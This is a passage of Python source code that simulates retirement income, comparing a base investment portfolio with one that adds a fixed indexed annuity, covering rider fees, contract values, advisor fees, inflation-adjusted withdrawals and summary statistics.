'portfolio_return'] = median_returns_smallest.dot(wts)\n # median_smallest_fia = pd.DataFrame({'FIA': asset_median_returns(read_small, 'r_FIA')})\n #\n # # dataframe for unsorted returns (normal)\n # median_returns_largest = pd.DataFrame({t: asset_median_returns(read_large, t) for t in tickers})\n # median_returns_largest.loc[:, 'portfolio_return'] = median_returns_largest.dot(wts)\n # median_largest_fia = pd.DataFrame({'FIA': asset_median_returns(read_large, 'r_FIA')})\n\n years = list(range(0, num_of_years + 1))\n income_cols = ['year', 'strategy_term', 'index_returns', 'term_ret', 'term_ret_with_par', 'term_annualize',\n 'ann_net_spread', 'term_ret_netspr', 'high_inc_benefit_base', 'rider_fee', 'eoy_income',\n 'contract_value']\n\n term = int(read_income_inputs.loc['term', 'inputs'])\n fia_ret = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Returns']\n fia_risk = read_returns_est.loc[read_returns_est.index[-1], 'Annualized Risk']\n par_rate = float(read_income_inputs.loc['par_rate', 'inputs'])\n spread = float(read_income_inputs.loc['spread', 'inputs'])\n bonus_term = int(read_income_inputs.loc['bonus_term', 'inputs'])\n premium = float(read_income_inputs.loc['premium', 'inputs'])\n income_bonus = float(read_income_inputs.loc['income_bonus', 'inputs'])\n\n income_starts = int(read_income_inputs.loc['start_income_years', 'inputs'])\n income_growth = float(read_income_inputs.loc['income_growth', 'inputs'])\n rider_fee = float(read_income_inputs.loc['rider_fee', 'inputs'])\n inc_payout_factor = float(read_income_inputs.loc['income_payout_factor', 'inputs'])\n contract_bonus = float(read_income_inputs.loc['contract_bonus', 'inputs'])\n social = float(read_income_inputs.loc['social', 'inputs'])\n inflation = float(read_income_inputs.loc['inflation', 'inputs'])\n wtd_cpn_yield = float(read_income_inputs.loc['wtd_coupon_yld', 'inputs'])\n life_expectancy = int(read_income_inputs.loc['life_expectancy_age', 'inputs'])\n clients_age = int(read_income_inputs.loc['clients_age', 'inputs'])\n \n # -------------For Constant Growth Rates------------------------\n const_fia_index_ret = float(read_income_inputs.loc['const_fia_index_ret', 'inputs'])\n const_risky_port_ret = float(read_income_inputs.loc['const_risky_port_ret', 'inputs'])\n\n # ---------------INCOME MODEL--------------------------------------------\n runs = 0\n returns_dict = {}\n asset_dict = {}\n fia_dict = {}\n\n income_df = pd.DataFrame(index=years, columns=income_cols)\n income_df.loc[:, 'year'] = years\n income_df.loc[:, 'strategy_term'] = income_df.loc[:, 'year'] % term\n income_df.loc[:, 'strategy_term'] = income_df['strategy_term'].apply(lambda x: 1 if x == 0 else 0)\n\n if method == 'normal':\n # income_df.loc[:, 'index_returns'] = read_normal.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n # ----------CONSTANT FIA INDEX GROWTH RATE-------------------\n income_df.loc[:, 'index_returns'] = const_fia_index_ret\n\n elif method == 'smallest':\n income_df.loc[:, 'index_returns'] = read_small.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n\n else:\n income_df.loc[:, 'index_returns'] = read_large.loc[:, '{}_{}'.format('r_FIA', str(runs))]\n\n # income_df.loc[:, 'index_returns'] = np.random.normal(fia_ret, fia_risk, size=(len(years), 1))\n\n cumprod = (1. 
+ income_df['index_returns']).rolling(window=term).agg(lambda x: x.prod()) - 1\n income_df.loc[:, 'term_ret'] = np.where(income_df.loc[:, 'strategy_term'] == 1, cumprod, 0)\n income_df.loc[:, 'term_ret_with_par'] = income_df.loc[:, 'term_ret'] * par_rate\n income_df.loc[:, 'term_annualize'] = income_df.loc[:, 'term_ret_with_par'].apply(\n lambda x: (1 + x) ** (1 / term) - 1)\n income_df.loc[:, 'ann_net_spread'] = income_df.loc[:, 'term_annualize'] - spread\n income_df.loc[:, 'ann_net_spread'] = np.where(income_df.loc[:, 'strategy_term'] == 1,\n income_df.loc[:, 'ann_net_spread'], 0)\n income_df.loc[:, 'term_ret_netspr'] = income_df.loc[:, 'ann_net_spread'].apply(lambda x: (1 + x) ** term - 1)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'high_inc_benefit_base'] = premium * (1 + income_bonus)\n\n elif counter <= min(bonus_term, income_starts):\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base'] * \\\n (1 + income_growth)\n else:\n income_df.loc[counter, 'high_inc_benefit_base'] = income_df.loc[counter - 1, 'high_inc_benefit_base']\n\n income_df.loc[:, 'rider_fee'] = income_df.loc[:, 'high_inc_benefit_base'] * rider_fee\n income_df.loc[:, 'eoy_income'] = np.where(income_df.loc[:, 'year'] > income_starts,\n income_df.loc[:, 'high_inc_benefit_base'] * inc_payout_factor, 0)\n\n for counter in years:\n if counter == 0:\n income_df.loc[counter, 'contract_value'] = premium * (1 + contract_bonus)\n\n elif income_df.loc[counter, 'strategy_term'] == 1:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee']\n x2 = (x1 * (1 + income_df.loc[counter, 'term_ret_netspr'])) - income_df.loc[counter, 'eoy_income']\n income_df.loc[counter, 'contract_value'] = x2\n\n else:\n x1 = income_df.loc[counter - 1, 'contract_value'] - income_df.loc[counter, 'rider_fee'] - \\\n income_df.loc[counter, 'eoy_income']\n\n income_df.loc[counter, 'contract_value'] = x1\n\n # variable stores the income number that is used in the base and fia portfolio calcs.\n\n income_from_fia = income_df.loc[income_df.index[-1], 'eoy_income']\n\n income_df.loc[:, 'contract_value'] = income_df.loc[:, 'contract_value'].apply(lambda x: 0 if x <= 0 else x)\n\n sim_fia_cv.loc[:, str(runs)] = income_df.loc[:, 'contract_value']\n\n # -------------------------------------BASE MODEL---------------------------------------------\n\n base_wts = read_asset_weights.loc[:, 'base']\n base_assets = list(base_wts.index)\n base_weights = list(base_wts.values)\n base_returns = list(read_returns_est.loc[:, 'Annualized Returns'].values)\n base_std = list(read_returns_est.loc[:, 'Annualized Risk'].values)\n\n base_investment = float(read_income_inputs.loc['risky_assets', 'Base'])\n adv_fees = float(read_income_inputs.loc['advisor_fees', 'Base'])\n\n # -------------------required income----------------------------------\n req_annual_income = float(read_income_inputs.loc['annual_income', 'inputs'])\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n cpn_income_base = base_investment * wtd_cpn_yield\n\n # ----------------------RANDOM RETURNS--------------------------\n r_cols = ['r_{}'.format(name) for name in base_assets]\n boy_value = ['bv_{}'.format(name) for name in base_assets]\n eoy_value = ['ev_{}'.format(name) for name in base_assets]\n\n random_returns = pd.DataFrame(index=income_df.index, columns=r_cols)\n\n # for c in range(len(r_cols)):\n # ret = np.random.normal(base_returns[c], 
base_std[c], size=(len(random_returns.index), 1))\n\n if method == 'smallest':\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_small.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = np.sort(ret.flatten())\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): np.sort(ret.flatten())})\n\n elif method == 'largest':\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_large.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = np.flip(np.sort(ret.flatten()))\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): np.flip(np.sort(ret.flatten()))})\n\n else:\n this_run_cols = ['{}_{}'.format(cname, str(runs)) for cname in r_cols]\n random_returns = read_normal.loc[:, this_run_cols]\n\n # random_returns.loc[:, r_cols[c]] = ret.flatten()\n # asset_dict.update({'{}_{}'.format(r_cols[c], str(runs)): ret.flatten()})\n\n # store the simulated assets returns in one dictionary\n # returns_dict.update({str(runs): random_returns})\n\n # collect the asset based returns from all simulation and calculate the median returns.\n # def get_median_returns(sym):\n # cols = [sym + '_' + str(c) for c in np.arange(trials)]\n # asset_df = pd.DataFrame({c: asset_dict.get(c) for c in cols})\n # return asset_df.median(axis=1)\n #\n # asset_median_returns = pd.DataFrame({symbol: get_median_returns(symbol) for symbol in r_cols})\n #\n # asset_median_returns.loc[:, 'simulated_portfolio_median_returns'] = asset_median_returns.dot(base_weights)\n\n base_df = random_returns.copy()\n pre_income_base_df = random_returns.copy()\n\n # base_investment = float(read_portfolio_inputs.loc['risky_assets', 'Base'])\n\n fia_portfolio_df = random_returns.copy()\n pre_income_port_df = random_returns.copy()\n port_investment = float(read_income_inputs.loc['risky_assets', 'FIA'])\n cpn_income_port = port_investment * wtd_cpn_yield\n\n # ---------Initial Investments for pre-income account values---------------------\n pre_income_base_inv = base_investment\n pre_income_port_inv = port_investment\n # ----------------------------------------BASE PORTFOLIO----------------------------\n for name in boy_value:\n base_df.loc[:, name] = 0.0\n pre_income_base_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n # ---------------For year 0, the year of investment------------\n\n # ------------Calculate the annual portfolio returns - Gross Returns--------------------\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n\n pre_income_base_df.loc[counter, boy_value] = [base_weights[c] *\n pre_income_base_inv for c in range(len(boy_value))]\n pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_inv = pre_income_base_df.loc[counter, boy_value].sum()\n\n # ------------------Pre Income Block Ends------------------------\n\n base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n\n base_df.loc[counter, 'total_net_fees'] = 0.0\n base_df.loc[counter, 'income'] = 0.0\n # base_investment = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total_pre_income'] = base_investment\n\n elif (counter > 0) and (counter < income_starts):\n\n # ----For years between the start of the investment and start if the income---------------\n base_df.loc[counter, 
boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_base_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_base_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n pre_income_base_df.loc[counter, 'adv_fees'] = pre_income_base_df.loc[counter, 'total'] * adv_fees\n pre_income_base_df.loc[counter, 'total_net_fees'] = pre_income_base_df.loc[counter, 'total'] - \\\n pre_income_base_df.loc[counter, 'adv_fees']\n pre_income_base_inv = pre_income_base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total'] = base_investment * (1 + 0.06)\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - base_df.loc[\n counter, 'adv_fees']\n\n # --coupon payment is invested back into the risky portfolio until the income is withdrawn----\n base_investment = base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total_net_fees']\n\n else:\n\n # -------------For Years after the income started----------------------\n base_df.loc[counter, boy_value] = [base_weights[c] * base_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_base_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_base_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_base_df.loc[counter, 'total'] = pre_income_base_df.loc[counter, boy_value].sum()\n pre_income_base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n pre_income_base_df.loc[counter, 'adv_fees'] = pre_income_base_df.loc[counter, 'total'] * adv_fees\n pre_income_base_df.loc[counter, 'total_net_fees'] = pre_income_base_df.loc[counter, 'total'] - \\\n pre_income_base_df.loc[counter, 'adv_fees']\n pre_income_base_inv = pre_income_base_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # base_df.loc[counter, 'total'] = base_df.loc[counter, boy_value].sum()\n base_df.loc[counter, 'total'] = base_investment * (1 + const_risky_port_ret)\n base_df.loc[counter, 'adv_fees'] = base_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. 
income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n base_df.loc[counter, 'income'] = income_needed - cpn_income_base\n income_needed = income_needed + social\n\n base_df.loc[counter, 'total_net_fees'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees'] - \\\n base_df.loc[counter, 'income']\n\n base_df.loc[counter, 'total_pre_income'] = base_df.loc[counter, 'total'] - \\\n base_df.loc[counter, 'adv_fees']\n\n base_investment = base_df.loc[counter, 'total_net_fees']\n\n # -------------------Portfolio with PreIncome Values----------------------------\n sim_base_total_preincome.loc[:, 's_{}'.format(str(runs))] = pre_income_base_df.loc[:, 'total_net_fees']\n sim_base_total_preincome.fillna(float(read_income_inputs.loc['risky_assets', 'Base']), inplace=True)\n # --------------------------------PreIncome Block Ends----------------------------\n\n base_df.loc[:, 'adj_total'] = base_df.loc[:, 'total_net_fees'].apply(lambda x: x if x > 0 else 0)\n sim_base_total.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_net_fees']\n sim_base_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'income']\n sim_base_total_pre_income.loc[:, 's_{}'.format(str(runs))] = base_df.loc[:, 'total_pre_income']\n\n # ----------------------------FIA PORTFOLIO----------------------------------------------\n for name in boy_value:\n fia_portfolio_df.loc[:, name] = 0.0\n pre_income_port_df.loc[:, name] = 0.0\n\n for counter in years:\n period_returns = list(random_returns.loc[counter, :])\n if counter == 0:\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n\n pre_income_port_df.loc[counter, boy_value] = [base_weights[c] *\n pre_income_port_inv for c in range(len(boy_value))]\n pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n pre_income_port_inv = pre_income_port_df.loc[counter, boy_value].sum()\n\n # ------------------Pre Income Block Ends------------------------\n\n fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_net_fees'] = 0.0\n fia_portfolio_df.loc[counter, 'income'] = 0.0\n # port_investment = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total_pre_income'] = port_investment\n\n elif (counter > 0) and (counter < income_starts):\n\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # ------------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_port_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_port_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n \n # -----------------------CONSTANT GROWTH RATE-----------------\n pre_income_port_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n\n pre_income_port_df.loc[counter, 'adv_fees'] = pre_income_port_df.loc[counter, 'total'] * adv_fees\n pre_income_port_df.loc[counter, 'total_net_fees'] = pre_income_port_df.loc[counter, 'total'] 
- \\\n pre_income_port_df.loc[counter, 'adv_fees']\n pre_income_port_inv = pre_income_port_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n \n # -------CONSTANT GROWTH RATE-----------------\n fia_portfolio_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees'] + cpn_income_port\n\n else:\n fia_portfolio_df.loc[counter, boy_value] = [base_weights[c] * port_investment * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # -------------Record the Pre Income Base Portfolio-----------------------------\n pre_income_port_df.loc[counter, boy_value] = [\n base_weights[c] * pre_income_port_inv * (1 + period_returns[c])\n for c in range(len(boy_value))]\n\n # pre_income_port_df.loc[counter, 'total'] = pre_income_port_df.loc[counter, boy_value].sum()\n pre_income_port_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n pre_income_port_df.loc[counter, 'adv_fees'] = pre_income_port_df.loc[counter, 'total'] * adv_fees\n pre_income_port_df.loc[counter, 'total_net_fees'] = pre_income_port_df.loc[counter, 'total'] - \\\n pre_income_port_df.loc[counter, 'adv_fees']\n pre_income_port_inv = pre_income_port_df.loc[counter, 'total_net_fees'] + cpn_income_base\n\n # ------------------Pre Income Block Ends------------------------\n\n # fia_portfolio_df.loc[counter, 'total'] = fia_portfolio_df.loc[counter, boy_value].sum()\n fia_portfolio_df.loc[counter, 'total'] = port_investment * (1 + const_risky_port_ret)\n fia_portfolio_df.loc[counter, 'adv_fees'] = fia_portfolio_df.loc[counter, 'total'] * adv_fees\n\n # ---req. income is adjusted for inflation from the second year of withdrawal. Reinvestment of coupon\n # stops from the year income starts. Req. 
income is reduced by the coupon payments\n\n if counter == income_starts:\n\n income_needed = req_annual_income - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = req_annual_income\n\n else:\n income_needed = income_needed * (1 + inflation) - social\n income_net_fia_income = max(0, income_needed - income_from_fia)\n fia_portfolio_df.loc[counter, 'income'] = max(0, income_net_fia_income - cpn_income_port)\n income_needed = income_needed + social\n\n fia_portfolio_df.loc[counter, 'total_net_fees'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees'] - \\\n fia_portfolio_df.loc[counter, 'income']\n\n fia_portfolio_df.loc[counter, 'total_pre_income'] = fia_portfolio_df.loc[counter, 'total'] - \\\n fia_portfolio_df.loc[counter, 'adv_fees']\n\n port_investment = fia_portfolio_df.loc[counter, 'total_net_fees']\n\n sim_port_total.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'income']\n\n fia_portfolio_df.loc[:, 'adj_total'] = fia_portfolio_df.loc[:, 'total_net_fees'].apply(\n lambda x: x if x > 0 else 0)\n\n sim_port_total_pre_income.loc[:, 's_{}'.format(str(runs))] = fia_portfolio_df.loc[:, 'total_pre_income']\n\n # -------------------Portfolio with PreIncome Values----------------------------\n sim_port_total_preincome.loc[:, 's_{}'.format(str(runs))] = pre_income_port_df.loc[:, 'total_net_fees'] + \\\n income_df.loc[:, 'contract_value']\n\n sim_port_total_preincome.fillna(float(read_income_inputs.loc['risky_assets', 'FIA']), inplace=True)\n \n # --------------------------------PreIncome Block Ends----------------------------\n\n # ------------------Calculate % of portfolios ending value greater than required LIFETIME cumm. 
income---------\n total_income_by_age = sim_base_income.loc[:, sim_base_income.columns[0]].cumsum()\n total_income_by_acturial_age = total_income_by_age.loc[life_expectancy - clients_age]\n total_income_by_age.fillna(0, inplace=True)\n income_dataframe = pd.DataFrame(total_income_by_age)\n income_dataframe.loc[:, 'remaining_income_by_acturial_age'] = total_income_by_age.apply(\n lambda x: total_income_by_acturial_age - x)\n\n s = income_dataframe.loc[:, 'remaining_income_by_acturial_age']\n base_prob_of_success = sim_base_total.gt(s, axis=0).sum(axis=1)\n port_prob_of_success = sim_port_total.gt(s, axis=0).sum(axis=1)\n\n # ----------------------------Portfolio sufficient for NEXT YEARS income needs-------------------\n next_year_income = sim_base_income.loc[:, sim_base_income.columns[0]].shift(-1).fillna(0) # Yearly Income Reqd.\n base_success_next_year = sim_base_total.gt(next_year_income, axis=0).sum(axis=1)\n\n base_for_next_year_need = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n\n port_success_next_year = sim_port_total.gt(next_year_income, axis=0).sum(axis=1)\n\n port_for_next_year_need = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ---------------Portfolio for 45 years of simulation---------------------------------------\n base_success_portfolio = sim_base_total[sim_base_total.gt(next_year_income, axis=0)]\n port_success_portfolio = sim_port_total[sim_port_total.gt(next_year_income, axis=0)]\n\n # ----------------Portfolio Simulation until the acturial age------------------------------\n acturial_years = life_expectancy - clients_age\n base_success_portfolio_act_age = base_success_portfolio.loc[acturial_years, :]\n port_success_portfolio_act_age = port_success_portfolio.loc[acturial_years, :]\n\n # -------------------------Base Portfolio TS with max Terminal Value ----------------------------\n if base_success_portfolio_act_age.isnull().sum() == trials:\n base_max_portfolio = 0.0\n else:\n base_max_portfolio = base_success_portfolio.loc[:, base_success_portfolio_act_age.idxmax()]\n\n # -------------------------FIA Portfolio TS with max Terminal Value ----------------------------\n if port_success_portfolio_act_age.isnull().sum() == trials:\n port_max_portfolio = 0.0\n else:\n port_max_portfolio = port_success_portfolio.loc[:, port_success_portfolio_act_age.idxmax()]\n\n # ------------------------------Average age with full income------------------------------\n base_mean_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n port_mean_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).mean()\n\n # ----------------------------Median Age with full Income------------------------------------------\n base_median_age = ((life_expectancy - clients_age) - base_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n port_median_age = ((life_expectancy - clients_age) - port_success_portfolio.loc[1:life_expectancy - clients_age, :]\n .isnull().sum()).median()\n\n # --------------Mean Value for all the portfolios at end of the acturial age--------------------\n base_act_avg_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n port_act_avg_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).mean()\n\n # --------------Median Value for all the portfolios at end of the acturial age--------------------\n 
base_act_median_porfolio = base_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n port_act_median_porfolio = port_success_portfolio.loc[life_expectancy - clients_age, :].fillna(0).median()\n\n # # --------------Mean Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().mean()\n #\n # # --------------Median Value for all the portfolios in the simulation--------------------\n # base_sim_mean = base_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n # port_sim_mean = port_success_portfolio.loc[1:life_expectancy - clients_age, :].mean().median()\n\n # -------Max Portfolio value at the end of acturial age----------------------------------------\n base_act_max = base_success_portfolio.loc[life_expectancy - clients_age, :].max()\n port_act_max = port_success_portfolio.loc[life_expectancy - clients_age, :].max()\n\n # -------Min Portfolio value at the end of acturial age----------------------------------------\n base_act_min = base_success_portfolio.loc[life_expectancy - clients_age, :].min()\n port_act_min = port_success_portfolio.loc[life_expectancy - clients_age, :].min()\n\n # ---------------------Lifetime Average Income----------------------------------\n base_total_income = sim_base_income.cumsum().loc[acturial_years, :].mean()\n port_total_income = income_from_fia + sim_port_income\n port_total_income = port_total_income.cumsum().loc[acturial_years, :].mean()\n\n simulation_stats = pd.DataFrame(index=['Average Years', 'Median Years', 'Average Age', 'Median Age',\n 'Average Portfolio (act.age)', 'Median Portfolio (act.age)',\n 'Max Portfolio Value', 'Min Portfolio Value',\n 'Average Lifetime Income'], columns=['Base', 'FIA'])\n\n simulation_stats.loc['Average Years', :] = [base_mean_age, base_mean_age]\n simulation_stats.loc['Median Years', :] = [base_median_age, base_median_age]\n simulation_stats.loc['Average Age', :] = [base_mean_age + clients_age, base_mean_age + clients_age]\n simulation_stats.loc['Median Age', :] = [base_median_age + clients_age, base_median_age + clients_age]\n simulation_stats.loc['Average Portfolio (act.age)', :] = [base_act_avg_porfolio, port_act_avg_porfolio]\n simulation_stats.loc['Median Portfolio (act.age)', :] = [base_act_median_porfolio, port_act_median_porfolio]\n simulation_stats.loc['Max Portfolio Value', :] = [base_act_max, port_act_max]\n simulation_stats.loc['Min Portfolio Value', :] = [base_act_min, port_act_min]\n simulation_stats.loc['Average Lifetime Income', :] = [base_total_income, port_total_income]\n comments = ['Average years of portfolios that meet the next years income needs for the lifetime',\n 'Median years of portfolios that meet the next years income needs for the lifetime',\n 'Average Clients Age',\n 'Median Clients Age',\n 'Average of terminal values for the portfolios at the end of the acturial life',\n 'Median of terminal values for the portfolios at the end of the acturial life',\n 'Maximum of terminal values for the portfolios at the end of the acturial life',\n 'Minimum of terminal values for the portfolios at the end of the acturial life',\n 'Average of total income generated by all portfolios at the end of the acturial life']\n\n simulation_stats.loc[:, 'Notes'] = comments\n\n # --------------------------------------------------------------------------------\n\n # # 
-----------------------------------income breakdown for Base portfolio----------------------------------\n # base_df.to_csv(src + 'base_port_detail.csv')\n # sim_base_total.to_csv(src + 'base_ending_values.csv')\n # income_breakdown_base = pd.DataFrame(sim_base_total.quantile(0.5, axis=1))\n # income_breakdown_base.loc[:, 'income_from_portfolio'] = sim_base_income.quantile(0.5, axis=1)\n # income_breakdown_base.loc[:, 'fia_income'] = 0.0\n # income_breakdown_base.loc[:, 'social_security_income'] = social\n # income_breakdown_base.loc[:, 'coupon_income'] = cpn_income_base\n #\n # income_breakdown_base.rename(columns={income_breakdown_base.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_base.loc[:, 'income_from_portfolio'][\n # income_breakdown_base.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_base.loc[:, 'total_income'] = income_breakdown_base.loc[:, income_breakdown_base.columns[1:]].sum(\n # axis=1)\n #\n # # --------------------------------------Block Ends-----------------------------------------------------------\n #\n # # ---------------------------------------income breakdown for FIA portfolio----------------------------------\n # fia_portfolio_df.to_csv(src + 'fia_port_detail.csv')\n # sim_port_total.to_csv(src + 'fiaport_ending_values.csv')\n #\n # income_breakdown_port = pd.DataFrame(sim_port_total.quantile(0.5, axis=1))\n # income_breakdown_port.loc[:, 'income_from_portfolio'] = sim_port_income.quantile(0.5, axis=1)\n # income_breakdown_port.loc[:, 'fia_income'] = income_from_fia\n # income_breakdown_port.loc[:, 'social_security_income'] = social\n # income_breakdown_port.loc[:, 'coupon_income'] = cpn_income_port\n #\n # income_breakdown_port.rename(columns={income_breakdown_port.columns[0]: 'portfolio_ending_value'}, inplace=True)\n # income_breakdown_port.loc[:, 'income_from_portfolio'][\n # income_breakdown_port.loc[:, 'portfolio_ending_value'] <= 0] = 0\n # income_breakdown_port.loc[:, 'total_income'] = income_breakdown_port.loc[:, income_breakdown_port.columns[1:]].sum(\n # axis=1)\n #\n # # ----------------------------------Block Ends-------------------------------------------------------------\n q_cut = [0.0, 0.1, 0.25, 0.5, 0.75, 0.95, 1.0]\n sim_base_income[sim_base_total < income_needed] = 0.0\n\n sim_port_income[sim_port_total < income_net_fia_income] = 0\n\n sim_port_income = sim_port_income + income_from_fia\n\n # base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n #\n # port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile([0.05, 0.25, 0.50, 0.75, 0.90])\n\n base_quantile = sim_base_total.loc[sim_base_total.index[-1]].quantile(q_cut)\n\n port_quantile = sim_port_total.loc[sim_port_total.index[-1]].quantile(q_cut)\n\n # q_cut = [0.0, .05, 0.25, 0.5, 0.75, 0.95, 1.0]\n cols = ['Min', '10th', '25th', '50th', '75th', '90th', 'Max']\n\n # ------------------------------------------drop year 0-----------------------------------------\n sim_base_total = sim_base_total[1:]\n sim_port_total = sim_port_total[1:]\n\n # ---------------------------------plot for histogram for porfolios--------------------------------------\n # base_term_value = sim_base_total.loc[sim_base_total.index[:life_expectancy - clients_age], :]\n # fact = 1 / len(base_term_value)\n # base_ann_ret = (base_term_value.iloc[-1] / base_term_value.iloc[0]) ** fact - 1\n # counts, bins, bars = plt.hist(base_ann_ret)\n\n # ------------------------quantile analysis for base terminal 
